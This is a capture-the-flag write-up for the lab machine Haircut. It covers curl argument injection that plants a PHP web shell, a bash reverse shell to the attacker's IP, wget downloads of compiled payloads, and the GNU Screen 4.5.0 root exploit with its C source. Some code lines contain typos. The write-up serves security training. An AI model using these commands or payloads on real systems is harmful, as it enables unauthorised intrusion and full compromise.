✅Haircut (Medium)
Lesson Learn
Report-Penetration
Vulnerable Exploit: Curl Command Injection
System Vulnerable: 10.10.10.24
Vulnerability Explanation: By exposed upload directory and improper validated user input which could allow attacker to upload malicious file and gain access on the system.
Privilege Escalation Vulnerability: screen version 4.5.0 vulnerable to Local Privilege Escalation
Vulnerability Fix: Ensure that unauthorized user could not access to Upload Folder and validate user input extension.
Severity: High
Step to Compromise the Host:
Reconnaissance
└─$ nmap -p- -sC -sV -T4 10.10.10.24 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-02 21:35 EST
Nmap scan report for 10.10.10.24
Host is up (0.042s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
| 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelEnumeration
Port 80 nginx/1.10.0
A simple webpage and source code nothing is interesting.
Run gobuster to check hidden directory.
└─$ gobuster dir -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x.php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.24
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/12/02 21:50:56 Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 194] [--> http://10.10.10.24/uploads/]
/exposed.php (Status: 200) [Size: 446] 
Let start our http server on kali machine and replace localhost with our IP address.
Intercept burp proxy, the argument maybe,
formurl = system(./curl $url)we can inject the payload in curl,
formurl = system(./curl -o /uploads/test.html $url)Let create a simple file test.html and use curl to upload the file
formurl=-o /var/www/html/uploads/test http://10.10.14.7/test.html&submit=Go 
Let go to /uploads to verify, if we have upload successful.
Confirms that we can upload and execute the file.
Exploitation
Let upload command execute shell.php
<?php system($_REQUST['cmd']; ?>Let upload our file to the application
formurl=-o+/var/www/html/uploads/shell.php+http://10.10.14.7/shell.php&submit=Go Confirms we can perform command execution.
we can replace command with bash reverse shell and start netcat listener on port 4444
nc -vlp 4444GET /uploads/shell.php?cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.7/4444 0>&1' HTTP/1.1
Privilege Escalation
Find misconfigure on SUID
www-data@haircut:/home/maria$ find / -type f -perm -4000 -ls 2>/dev/null
53377 140 -rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
52805 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
53367 32 -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
52955 40 -rwsr-xr-x 1 root root 40128 May 4 2017 /bin/su
52791 40 -rwsr-xr-x 1 root root 40152 Dec 16 2016 /bin/mount
52804 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
52839 28 -rwsr-xr-x 1 root root 27608 Dec 16 2016 /bin/umount
262400 136 -rwsr-xr-x 1 root root 136808 Jan 20 2017 /usr/bin/sudo
273351 24 -rwsr-xr-x 1 root root 23376 Jan 18 2016 /usr/bin/pkexec
266457 36 -rwsr-xr-x 1 root root 32944 May 4 2017 /usr/bin/newuidmap
266260 40 -rwsr-xr-x 1 root root 39904 May 4 2017 /usr/bin/newgrp
266765 36 -rwsr-xr-x 1 root root 32944 May 4 2017 /usr/bin/newgidmap
267324 76 -rwsr-xr-x 1 root root 75304 May 4 2017 /usr/bin/gpasswd
273121 52 -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
267325 56 -rwsr-xr-x 1 root root 54256 May 4 2017 /usr/bin/passwd
268146 1552 -rwsr-xr-x 1 root root 1588648 May 19 2017 /usr/bin/screen-4.5.0
267327 40 -rwsr-xr-x 1 root root 40432 May 4 2017 /usr/bin/chsh
267323 52 -rwsr-xr-x 1 root root 49584 May 4 2017 /usr/bin/chfn
265697 40 -rwsr-xr-x 1 root root 38984 Mar 7 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
272188 44 -rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
28123 204 -rwsr-xr-x 1 root root 208680 Apr 29 2017 /usr/lib/snapd/snap-confine
265195 12 -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
267345 420 -rwsr-xr-x 1 root root 428240 Mar 16 2017 /usr/lib/openssh/ssh-keysign
26270 16 -rwsr-xr-x 1 root root 14864 Jan 18 2016 /usr/lib/policykit-1/polkit-agent-helper-1/usr/bin/screen-4.5.0
└─$ searchsploit screen | grep 4.5.0
GNU Screen 4.5.0 - Local Privilege Escalation | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | linux/local/41152.txt└─$ searchsploit -m 41154.sh
Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/41154
Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
File Type: Bourne-Again shell script, ASCII text executable, with CRLF line terminators
Copied to: /home/pwned/Desktop/HTB/haircut/41154.shLet create those two files and compile on our local machine to avoid error.
└─$ cat libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}└─$ cat rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}Let Compile those 2 files.
└─$ gcc -fPIC -shared -ldl -o libhax.so libhax.c
libhax.c: In function ‘dropshell’:
libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
7 | chmod("/tmp/rootshell", 04755);
| ^~~~~
└─$ gcc -o rootshell rootshell.c
rootshell.c: In function ‘main’:
rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
3 | setuid(0);
| ^~~~~~
rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
4 | setgid(0);
| ^~~~~~
rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
5 | seteuid(0);
| ^~~~~~~
rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
6 | setegid(0);
| ^~~~~~~
rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
7 | execvp("/bin/sh", NULL, NULL);
| ^~~~~~
rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch] └─$ ls -l
total 52
-rwxr-xr-x 1 pwned pwned 1192 Dec 2 22:34 41154.sh
-rw-r--r-- 1 pwned pwned 252 Dec 2 22:38 libhax.c
-rwxr-xr-x 1 pwned pwned 15552 Dec 2 22:40 libhax.so
-rwxr-xr-x 1 pwned pwned 16256 Dec 2 22:40 rootshell
-rw-r--r-- 1 pwned pwned 134 Dec 2 22:39 rootshell.cLet copy the both compile file to our victim machine
www-data@haircut:/tmp$ wget 10.10.14.7/libhax.so
www-data@haircut:/tmp$ wget 10.10.14.7/rootshellLet change the directory to /etc
www-data@haircut:/tmp$ cd
www-data@haircut:/etc$ umask 000
www-data@haircut:/etc$ screen-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
www-data@haircut:/etc$ cat ld.so.preload
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
www-data@haircut:/etc$ screen-4.5.0 -ls
No Sockets found in /tmp/screens/S-www-data. Check on /tmp
www-data@haircut:/tmp$ ls -l
total 44
-rw-r--r-- 1 www-data www-data 15552 Dec 3 04:40 libhax.so
-rwsr-xr-x 1 root root 16256 Dec 3 04:40 rootshell
drwxr-xr-x 3 root www-data 4096 Dec 3 04:49 screens
drwx------ 3 root root 4096 Dec 3 03:35 systemd-private-9f3a568c237b4e50954129a9c4441868-systemd-timesyncd.service-0MUktY
drwx------ 2 root root 4096 Dec 3 03:36 vmware-root
www-data@haircut:/tmp$ ./rootshell
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)Last updated